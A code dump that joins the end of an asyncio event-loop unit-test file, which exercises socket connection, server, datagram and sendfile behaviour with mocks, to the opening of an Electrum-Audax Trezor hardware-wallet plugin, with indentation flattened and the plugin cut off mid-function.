m_socket.socket.return_value.bind = bind
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError('Err2')
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertTrue(str(cm.exception).startswith('Multiple exceptions: '))
self.assertTrue(m_socket.socket.return_value.close.called)
def _test_create_connection_ip_addr(self, m_socket, allow_inet_pton):
# Test the fallback code, even if this system has inet_pton.
if not allow_inet_pton:
del m_socket.inet_pton
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, '1.2.3.4', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('1.2.3.4', 80))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
if socket_helper.IPV6_ENABLED:
sock.family = socket.AF_INET6
coro = self.loop.create_connection(asyncio.Protocol, '::1', 80)
t, p = self.loop.run_until_complete(coro)
try:
# Without inet_pton we use getaddrinfo, which transforms
# ('::1', 80) to ('::1', 80, 0, 0). The last 0s are flow info,
# scope id.
[address] = sock.connect.call_args[0]
host, port = address[:2]
self.assertRegex(host, r'::(0\.)*1')
self.assertEqual(port, 80)
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'no IPv6 support')
@unittest.skipIf(sys.platform.startswith('aix'),
"bpo-25545: IPv6 scope id and getaddrinfo() behave differently on AIX")
@patch_socket
def test_create_connection_ipv6_scope(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
sock.family = socket.AF_INET6
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, 'fe80::1%1', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('fe80::1', 80, 0, 1))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@patch_socket
def test_create_connection_ip_addr(self, m_socket):
self._test_create_connection_ip_addr(m_socket, True)
@patch_socket
def test_create_connection_no_inet_pton(self, m_socket):
self._test_create_connection_ip_addr(m_socket, False)
@patch_socket
def test_create_connection_service_name(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
for service, port in ('http', 80), (b'http', 80):
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('127.0.0.1', port))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
for service in 'nonsense', b'nonsense':
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
def test_create_connection_no_local_addr(self):
async def getaddrinfo(host, *args, **kw):
if host == 'example.com':
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
else:
return []
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_connection_bluetooth(self, m_socket):
# See http://bugs.python.org/issue27136, fallback to getaddrinfo when
# we can't recognize an address is resolved, e.g. a Bluetooth address.
addr = ('00:01:02:03:04:05', 1)
def getaddrinfo(host, port, *args, **kw):
assert (host, port) == addr
return [(999, 1, 999, '', (addr, 1))]
m_socket.getaddrinfo = getaddrinfo
sock = m_socket.socket()
coro = self.loop.sock_connect(sock, addr)
self.loop.run_until_complete(coro)
def test_create_connection_ssl_server_hostname_default(self):
self.loop.getaddrinfo = mock.Mock()
def mock_getaddrinfo(*args, **kwds):
f = self.loop.create_future()
f.set_result([(socket.AF_INET, socket.SOCK_STREAM,
socket.SOL_TCP, '', ('1.2.3.4', 80))])
return f
self.loop.getaddrinfo.side_effect = mock_getaddrinfo
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.return_value = self.loop.create_future()
self.loop.sock_connect.return_value.set_result(None)
self.loop._make_ssl_transport = mock.Mock()
class _SelectorTransportMock:
_sock = None
def get_extra_info(self, key):
return mock.Mock()
def close(self):
self._sock.close()
def mock_make_ssl_transport(sock, protocol, sslcontext, waiter,
**kwds):
waiter.set_result(None)
transport = _SelectorTransportMock()
transport._sock = sock
return transport
self.loop._make_ssl_transport.side_effect = mock_make_ssl_transport
ANY = mock.ANY
handshake_timeout = object()
# First try the default server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='python.org',
ssl_handshake_timeout=handshake_timeout)
# Next try an explicit server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
# Finally try an explicit empty server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
def test_create_connection_no_ssl_server_hostname_errors(self):
# When not using ssl, server_hostname must be None.
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='python.org')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_server_hostname_errors(self):
# When using ssl, server_hostname may be None if host is non-empty.
coro = self.loop.create_connection(MyProto, '', 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, None, 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
sock = socket.socket()
coro = self.loop.create_connection(MyProto, None, None,
ssl=True, sock=sock)
self.addCleanup(sock.close)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
def test_create_server_empty_host(self):
# if host is empty string use None instead
host = object()
async def getaddrinfo(*args, **kw):
nonlocal host
host = args[0]
return []
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
fut = self.loop.create_server(MyProto, '', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertIsNone(host)
def test_create_server_host_port_sock(self):
fut = self.loop.create_server(
MyProto, '0.0.0.0', 0, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_host_port_sock(self):
fut = self.loop.create_server(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_getaddrinfo(self):
getaddrinfo = self.loop.getaddrinfo = mock.Mock()
getaddrinfo.return_value = self.loop.create_future()
getaddrinfo.return_value.set_result(None)
f = self.loop.create_server(MyProto, 'python.org', 0)
self.assertRaises(OSError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_nosoreuseport(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_soreuseport_only_defined(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.return_value = mock.Mock()
m_socket.SO_REUSEPORT = -1
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_cant_bind(self, m_socket):
class Err(OSError):
strerror = 'error'
m_socket.getaddrinfo.return_value = [
(2, 1, 6, '', ('127.0.0.1', 10100))]
m_socket.getaddrinfo._is_coroutine = False
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_server(MyProto, '0.0.0.0', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
@patch_socket
def test_create_datagram_endpoint_no_addrinfo(self, m_socket):
m_socket.getaddrinfo.return_value = []
m_socket.getaddrinfo._is_coroutine = False
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_addr_error(self):
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr='localhost')
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 1, 2, 3))
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_connect_err(self):
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, remote_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_allow_broadcast(self):
protocol = MyDatagramProto(create_future=True, loop=self.loop)
self.loop.sock_connect = sock_connect = mock.Mock()
sock_connect.return_value = []
coro = self.loop.create_datagram_endpoint(
lambda: protocol,
remote_addr=('127.0.0.1', 0),
allow_broadcast=True)
transport, _ = self.loop.run_until_complete(coro)
self.assertFalse(sock_connect.called)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_socket_err(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, local_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_no_matching_family(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol,
remote_addr=('127.0.0.1', 0), local_addr=('::1', 0))
self.assertRaises(
ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_setblk_err(self, m_socket):
m_socket.socket.return_value.setblocking.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
self.assertTrue(
m_socket.socket.return_value.close.called)
def test_create_datagram_endpoint_noaddr_nofamily(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_cant_bind(self, m_socket):
class Err(OSError):
pass
m_socket.getaddrinfo = socket.getaddrinfo
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_datagram_endpoint(
MyDatagramProto,
local_addr=('127.0.0.1', 0), family=socket.AF_INET)
self.assertRaises(Err, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
def test_create_datagram_endpoint_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('127.0.0.1', 0))
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
sock=sock)
transport, protocol = self.loop.run_until_complete(fut)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_datagram_endpoint_sock_unix(self):
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
family=socket.AF_UNIX)
transport, protocol = self.loop.run_until_complete(fut)
assert transport._sock.family == socket.AF_UNIX
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@socket_helper.skip_unless_bind_unix_socket
def test_create_datagram_endpoint_existing_sock_unix(self):
with test_utils.unix_socket_path() as path:
sock = socket.socket(socket.AF_UNIX, type=socket.SOCK_DGRAM)
sock.bind(path)
sock.close()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
path, family=socket.AF_UNIX)
transport, protocol = self.loop.run_until_complete(coro)
transport.close()
self.loop.run_until_complete(protocol.done)
def test_create_datagram_endpoint_sock_sockopts(self):
class FakeSock:
type = socket.SOCK_DGRAM
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, remote_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, family=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, proto=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, flags=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, reuse_port=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, allow_broadcast=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_datagram_endpoint_sockopts(self):
# Socket options should not be applied unless asked for.
# SO_REUSEPORT is not available on all platforms.
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0))
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
if reuseport_supported:
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_port=reuseport_supported,
allow_broadcast=True)
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
if reuseport_supported:
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
def test_create_datagram_endpoint_reuse_address_error(self):
# bpo-37228: Ensure that explicit passing of `reuse_address=True`
# raises an error, as it is not safe to use SO_REUSEADDR when using UDP
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=True)
with self.assertRaises(ValueError):
self.loop.run_until_complete(coro)
def test_create_datagram_endpoint_reuse_address_warning(self):
# bpo-37228: Deprecate *reuse_address* parameter
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=False)
with self.assertWarns(DeprecationWarning):
transport, protocol = self.loop.run_until_complete(coro)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_nosoreuseport(self, m_socket):
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_ip_addr(self, m_socket):
def getaddrinfo(*args, **kw):
self.fail('should not have called getaddrinfo')
m_socket.getaddrinfo = getaddrinfo
m_socket.socket.return_value.bind = bind = mock.Mock()
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('1.2.3.4', 0),
reuse_port=reuseport_supported)
t, p = self.loop.run_until_complete(coro)
try:
bind.assert_called_with(('1.2.3.4', 0))
m_socket.socket.assert_called_with(family=m_socket.AF_INET,
proto=m_socket.IPPROTO_UDP,
type=m_socket.SOCK_DGRAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
def test_accept_connection_retry(self):
sock = mock.Mock()
sock.accept.side_effect = BlockingIOError()
self.loop._accept_connection(MyProto, sock)
self.assertFalse(sock.close.called)
@mock.patch('asyncio.base_events.logger')
def test_accept_connection_exception(self, m_log):
sock = mock.Mock()
sock.fileno.return_value = 10
sock.accept.side_effect = OSError(errno.EMFILE, 'Too many open files')
self.loop._remove_reader = mock.Mock()
self.loop.call_later = mock.Mock()
self.loop._accept_connection(MyProto, sock)
self.assertTrue(m_log.error.called)
self.assertFalse(sock.close.called)
self.loop._remove_reader.assert_called_with(10)
self.loop.call_later.assert_called_with(
constants.ACCEPT_RETRY_DELAY,
# self.loop._start_serving
mock.ANY,
MyProto, sock, None, None, mock.ANY, mock.ANY)
def test_call_coroutine(self):
with self.assertWarns(DeprecationWarning):
@asyncio.coroutine
def simple_coroutine():
pass
self.loop.set_debug(True)
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
for func in (coro_func, coro_obj):
with self.assertRaises(TypeError):
self.loop.call_soon(func)
with self.assertRaises(TypeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(TypeError):
self.loop.call_later(60, func)
with self.assertRaises(TypeError):
self.loop.call_at(self.loop.time() + 60, func)
with self.assertRaises(TypeError):
self.loop.run_until_complete(
self.loop.run_in_executor(None, func))
@mock.patch('asyncio.base_events.logger')
def test_log_slow_callbacks(self, m_logger):
def stop_loop_cb(loop):
loop.stop()
async def stop_loop_coro(loop):
loop.stop()
asyncio.set_event_loop(self.loop)
self.loop.set_debug(True)
self.loop.slow_callback_duration = 0.0
# slow callback
self.loop.call_soon(stop_loop_cb, self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Handle.*stop_loop_cb.*> "
"took .* seconds$")
# slow task
asyncio.ensure_future(stop_loop_coro(self.loop), loop=self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Task.*stop_loop_coro.*> "
"took .* seconds$")
class RunningLoopTests(unittest.TestCase):
def test_running_loop_within_a_loop(self):
async def runner(loop):
loop.run_forever()
loop = asyncio.new_event_loop()
outer_loop = asyncio.new_event_loop()
try:
with self.assertRaisesRegex(RuntimeError,
'while another loop is running'):
outer_loop.run_until_complete(runner(loop))
finally:
loop.close()
outer_loop.close()
class BaseLoopSockSendfileTests(test_utils.TestCase):
DATA = b"12345abcde" * 16 * 1024 # 160 KiB
class MyProto(asyncio.Protocol):
def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
def connection_made(self, transport):
self.started = True
self.transport = transport
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
self.transport = None
async def wait_closed(self):
await self.fut
@classmethod
def setUpClass(cls):
cls.__old_bufsize = constants.SENDFILE_FALLBACK_READBUFFER_SIZE
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = 1024 * 16
with open(os_helper.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = cls.__old_bufsize
os_helper.unlink(os_helper.TESTFN)
super().tearDownClass()
def setUp(self):
from asyncio.selector_events import BaseSelectorEventLoop
# BaseSelectorEventLoop() has no native implementation
self.loop = BaseSelectorEventLoop()
self.set_event_loop(self.loop)
self.file = open(os_helper.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def make_socket(self, blocking=False):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(blocking)
self.addCleanup(sock.close)
return sock
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
def prepare(self):
sock = self.make_socket()
proto = self.MyProto(self.loop)
server = self.run_loop(self.loop.create_server(
lambda: proto, socket_helper.HOST, 0, family=socket.AF_INET))
addr = server.sockets[0].getsockname()
for _ in range(10):
try:
self.run_loop(self.loop.sock_connect(sock, addr))
except OSError:
self.run_loop(asyncio.sleep(0.5))
continue
else:
break
else:
# One last try, so we get the exception
self.run_loop(self.loop.sock_connect(sock, addr))
def cleanup():
server.close()
self.run_loop(server.wait_closed())
sock.close()
if proto.transport is not None:
proto.transport.close()
self.run_loop(proto.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test__sock_sendfile_native_failure(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop._sock_sendfile_native(sock, self.file,
0, None))
self.assertEqual(proto.data, b'')
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_no_fallback(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop.sock_sendfile(sock, self.file,
fallback=False))
self.assertEqual(self.file.tell(), 0)
self.assertEqual(proto.data, b'')
def test_sock_sendfile_fallback(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, len(self.DATA))
self.assertEqual(self.file.tell(), len(self.DATA))
self.assertEqual(proto.data, self.DATA)
def test_sock_sendfile_fallback_offset_and_count(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file,
1000, 2000))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, 2000)
self.assertEqual(self.file.tell(), 3000)
self.assertEqual(proto.data, self.DATA[1000:3000])
def test_blocking_socket(self):
self.loop.set_debug(True)
sock = self.make_socket(blocking=True)
with self.assertRaisesRegex(ValueError, "must be non-blocking"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_nonbinary_file(self):
sock = self.make_socket()
with open(os_helper.TESTFN, 'r') as f:
with self.assertRaisesRegex(ValueError, "binary mode"):
self.run_loop(self.loop.sock_sendfile(sock, f))
def test_nonstream_socket(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setblocking(False)
self.addCleanup(sock.close)
with self.assertRaisesRegex(ValueError, "only SOCK_STREAM type"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_notint_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, 'count'))
def test_negative_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, -1))
def test_notint_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 'offset'))
def test_negative_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, -1))
class TestSelectorUtils(test_utils.TestCase):
def check_set_nodelay(self, sock):
opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
self.assertFalse(opt)
base_events._set_nodelay(sock)
opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
self.assertTrue(opt)
@unittest.skipUnless(hasattr(socket, 'TCP_NODELAY'),
'need socket.TCP_NODELAY')
def test_set_nodelay(self):
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP)
with sock:
self.check_set_nodelay(sock)
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP)
with sock:
sock.setblocking(False)
self.check_set_nodelay(sock)
if __name__ == '__main__':
unittest.main()
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any
from electrum_audax.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_audax.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_audax.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum_audax import constants
from electrum_audax.i18n import _
from electrum_audax.plugin import Device
from electrum_audax.transaction import deserialize, Transaction
from electrum_audax.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_audax.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum_audax.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
RECOVERY_TYPE_SCRAMBLED_WORDS = RecoveryDeviceType.ScrambledWords
RECOVERY_TYPE_MATRIX = RecoveryDeviceType.Matrix
TREZORLIB = True
except Exception as e:
_logger.exception('error importing trezorlib')
TREZORLIB = False
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(2)
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
